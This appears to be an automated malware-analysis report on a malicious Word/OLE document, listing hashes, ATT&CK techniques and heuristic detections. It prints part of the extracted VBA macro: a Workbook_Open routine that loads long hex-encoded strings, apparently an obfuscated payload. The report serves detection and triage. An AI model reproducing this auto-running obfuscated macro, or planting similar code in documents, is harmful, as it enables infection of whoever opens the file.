Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 27212e2c415f25ca…

MALICIOUS

Office (OLE)

48.5 KB Created: 2018-02-22 02:10:00 Authoring application: Microsoft Office Word First seen: 2019-06-27
MD5: b4d939ed5ea7ac4dec3377946b1a7c17 SHA-1: 23a26797a117b82de5c8d1c8c6502f7130961bb4 SHA-256: 27212e2c415f25cad4451ea6e4eb4eb5fd3918c26c0f83c0ada5a1fa9e51d9d5
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The file contains VBA macros, including a Workbook_Open macro, which is a common technique for executing malicious code upon opening. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, strongly suggesting the execution of arbitrary commands. The presence of a VBA macro file named 'macros.bas' further supports this. The ClamAV detection also confirms the malicious nature of the file.

Heuristics 7

  • ClamAV: Xls.Malware.Cwsp-6735643-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10176 bytes
SHA-256: d6e6756817222a23f8d0a9528274f2405b52b666fa1003e72e5797bea32346c5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 38 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Sub Workbook_Open()
Dim OR_C As String
OR_C = "C5936C879460C3889471D394ABAA947194599294787C9494A1949494879294C2C2709494C0CBB5B762899663C58AD2945A94B5CB5E949E97B39479699455948F669490AB7894A19494949494949E6C615C9481959494B9BB9494629490A29D899494B394979494"
Dim NHG_FR As String
NHG_FR = "A89494948A94B9A969946C61949497946F7D94949494BD9494947B6F94C394C4B89494B08394A78494947895CCB5D16F9994C2949494A7619460928F7EB4A394C29494949489A3C394949AA268AE94949494B1CBC67E94C7A39494699494B8945FBA947B94948D"
Dim JCL_ICR As String
JCL_ICR = "9494589462949494948F94C5947B94946A94C5CA948FCE94C4945D94949475BC7894947A94BA949494D4949F9494D1639494946A6594C55F7BBC9469949494B5B85E94AF6294CB70949494949494948394B47D8960AB94B194948C94D0B27994AF94946B775594"
Dim ZOW_ML As String
ZOW_ML = "93948A9494A194946894B39481AC9497947F9493AAB9819494B89494C96094CB9494949494BEC6949494949182948C94799490558994AF95949494639494949494AC94989494B9948B6F949494778F94CB5ACAC594D4B86A9481949463AA9694989488945594C2"
Dim W_BPA As String
W_BPA = "6694949494CD949460D1C176CA9494BE94698C946F94617FB46F9497949459D458949494946D948694949475ACB38A945C94CD947C94B89494BF587DCC947394946894C8A294948F94CE9694D66294946D9494949494C7D094709494CD6F945794CC768A949490"
Dim YAE_WAN As String
YAE_WAN = "9494929E76B26B6CB26BA1B3809494667D7694B3BC94B2C6B49991665E949DCF94946F9494A5729459BE94819494C394BA9468949594B4949494765962C6B5589494CF949494B894949994C8948494948E94729494C894949494BB7D9481948394C79710C67A94"
Dim HO_MM As String
HO_MM = "9CBEA894BED394AD9494949494B394C1948671949C71569494B594D395949497C45F949494CE9494838E658B909494945F599494C0D2778B9494B1C38094945AC2B5A98894947694A094636094D394D159C991C3B1949494C88194D1A1B65794BE8594969494AE"
Dim FI_RH As String
FI_RH = "7ABC637594697F5D867394BF94CB8D9494C3C19494559491949494949494A7706B5CA39465949D7894B3C194A16585948C947894947A94948B9C9494C39494946D94B586AF94B294CCB6A99B9494A2CCC666CD9494B69B9499D1D4949C94948094CD94949483AC"
Dim OPA_QQN As String
OPA_QQN = "CA94CFC894D05698946A6AB25D947E94A9C49494B594A694947DBEAC699494C79475A99494947594D090948794AC7779A47CB29567A594948E94A0679484B3A294CE94B99494A379B77994745FA95B9A5D949394B5947EC75B7761CD949460C6945D948E94B9AB"
Dim K_MQ As String
K_MQ = "9494949494716E94C7949497749497949494C994C2946EA78F57CA049494B694C794ABAA94BF9494948494A7729494CF9494BD7094B194949494949D949494879494BD949498945594B6A5557292D2A794779494CE949E94946194945694867194949494668894"
Dim ALC_E As String
ALC_E = "BA946F9494BE9494CDD494949494AF94949465949294948589C1879D9495949494BFB394A489949F9071D463AAB194866D949B789494A5706D948AB39485949766978EAFAF94A394A876D494949455855694B394946F989494B89460B692946877C99486719494"
Dim CD_SZ As String
CD_SZ = "949484949994B2949455949D949B94956C5D759494949D949794947C7E94949F94948194949494816094949F9489947E946B946E90C4AEC27C9494BA5694947E9EB1AAC5C394949E94916DA294947094BD949489949494D0A180C4945D945E949475949294A594"
Dim XZ_ANG As String
XZ_ANG = "C77494B594AC619481949494829494B9BF9478976F9496948899AAC0CC94686D6ECB6A55949479959F97C2B7949494849473945B81CDAD76B3C3946794CB9494949468C9949494CB94949494947DACB27A94AD60619472946A7D66949494949494C7D16292B1A6"
Dim IA_I As String
IA_I = "9FD49494D49AC8949494B1949494C7AC949494A294AD7A9F946499949494709494947694B77794B1948685719D94AA70947BC6639494AF8B94C45694949494969494ADA694B29494949BB5946F9494AE8E949494629494BB9494949466AA947DD29459B6B3B7C9"
Dim JBF_FB As String
JBF_FB = "CBBC94BB716094949494949194A8949494A9946683ACA39480949E948AC194918A7E9473B59E945F7A7D946C6DAC949494CF6294A69B9494979494B494CA94BF55B67F6C947F5F7A5B5D94748B94949494B4949494CC9494AC6B9498945A946D949494B6A557D2"
Dim BUV_BD As String
BUV_BD = "A092699460957294945C9485D36AC7947994949464AF94946F94C3945F94CEBFB1C39494B8B594AC8EA19490949482589494949494A4C294CC7ECD949494949494A59465CA94A3
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.